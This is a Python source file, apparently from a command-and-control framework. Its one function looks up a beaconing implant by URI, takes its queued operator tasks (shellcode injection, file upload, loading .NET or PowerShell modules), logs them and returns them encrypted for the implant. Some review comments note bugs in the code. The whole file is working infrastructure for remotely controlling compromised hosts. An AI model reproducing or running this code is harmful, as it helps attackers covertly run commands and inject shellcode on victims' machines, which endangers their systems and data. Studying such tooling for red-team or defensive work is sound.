from Colours import Colours
from Core import load_module, load_module_sharp, encrypt, default_response
import DB, datetime, hashlib
def newTask(path):
    """Build the encrypted task response for the implant addressed by *path*.

    Iterates the rows returned by ``DB.get_implants_all()`` and handles the
    first one whose URI (column 1) occurs in *path*. Every queued task for
    that implant is written to the task log via ``DB.insert_task``, echoed to
    the operator console, prefixed with its zero-padded task id, removed from
    the new-task queue and joined into one ``multicmd`` string that is
    encrypted with the implant's key (column 5).

    Returns:
        The result of ``encrypt`` for the joined tasks ("" if ``encrypt``
        raised), ``default_response()`` when the implant matched but had no
        queued tasks, or ``None`` when no implant URI occurs in *path*.

    Raises:
        ValueError: if a task id is longer than five characters, or if a
            shellcode-style command contains no "#".
    """
    task_separator = "!d-3dion@LD!-d"
    timestamp_format = "%d/%m/%Y %H:%M:%S"
    shellcode_prefixes = (
        "$shellcode64",
        "$shellcode86",
        "run-exe core.program core inject-shellcode",
    )

    implants = DB.get_implants_all()
    if not implants:
        return None

    for implant in implants:
        implant_uri = implant[1]
        enc_key = implant[5]
        # The queue is read for every implant row, before the path is checked.
        tasks = DB.get_newtasks(implant_uri)

        # NOTE(review): this is a substring test on the request path, not an
        # exact comparison of a parsed URI component.
        if implant_uri not in path:
            continue

        if not tasks:
            # Nothing queued, but it is a normal beacon: record the check-in
            # and send the default response.
            now = datetime.datetime.now()
            DB.update_implant_lastseen(now.strftime(timestamp_format), implant_uri)
            return default_response()

        queued = []
        for task in tasks:
            command = task[2]
            user = task[3]
            user_command = command
            hostinfo = DB.get_hostinfo(implant_uri)
            issued_at = datetime.datetime.now()
            lowered = command.lower()

            if lowered.startswith(shellcode_prefixes):
                # Only the text after the first "#" goes to the task log; the
                # text before it is what is queued for the implant.
                marker = command.index("#")
                user_command = "Inject Shellcode: %s" % command[marker + 1:]
                command = command[:marker]
            elif lowered.startswith("upload-file"):
                filepath = command.replace("upload-file", "")
                if ";" in filepath:
                    filepath = filepath.split(";")[1].strip()
                elif "estination" in filepath:
                    filepath = filepath.split('"')[1].strip()
                else:
                    # A parse failure is only reported; the unparsed remainder
                    # is still hashed and logged below.
                    print(Colours.RED)
                    print("Error parsing upload command: %s" % filepath)
                    print(Colours.GREEN)
                # NOTE(review): the digest is taken over the path string, not
                # over file contents, so the "md5sum" written to the task log
                # cannot be matched against a hash of the uploaded file.
                filehash = hashlib.md5(filepath.encode("utf-8")).hexdigest()
                user_command = "Uploading file: %s with md5sum: %s" % (filepath, filehash)

            taskId = DB.insert_task(implant_uri, user_command, user)
            raw_id = str(taskId)
            # Left-pad with zeros to five characters; longer ids are rejected.
            taskIdStr = raw_id.rjust(5, "0")
            if len(raw_id) > 5:
                raise ValueError('Task ID is greater than 5 characters which is not supported.')

            print(Colours.YELLOW)
            stamp = issued_at.strftime(timestamp_format)
            if user is None or user == "":
                print("Task %s issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, hostinfo[0], hostinfo[11], hostinfo[2], hostinfo[3], stamp))
            else:
                print("Task %s (%s) issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, user, hostinfo[0], hostinfo[11], hostinfo[2], hostinfo[3], stamp))
            try:
                print(user_command)
                print(Colours.END)
            except Exception as e:
                print("Cannot print output: %s" % e)

            if task[2].startswith("loadmodule"):
                try:
                    module_name = task[2].replace("loadmodule ", "")
                    if ".exe" in module_name or ".dll" in module_name:
                        modulestr = load_module_sharp(module_name)
                    else:
                        modulestr = load_module(module_name)
                    command = "loadmodule%s" % modulestr
                except Exception as e:
                    # On failure the command text is left as it was and is
                    # still queued below.
                    print("Cannot find module, loadmodule is case sensitive!")
                    print(e)

            queued.append(taskIdStr + command)
            # NOTE(review): the task is removed from the queue here, before
            # encryption. If encrypt() fails below, the task log already shows
            # the task as issued although an empty response is returned.
            DB.del_newtasks(str(task[0]))

        multicmd = "multicmd%s" % task_separator.join(queued)
        try:
            responseVal = encrypt(enc_key, multicmd)
        except Exception as e:
            responseVal = ""
            print("Error encrypting value: %s" % e)
        now = datetime.datetime.now()
        DB.update_implant_lastseen(now.strftime(timestamp_format), implant_uri)
        return responseVal

    return None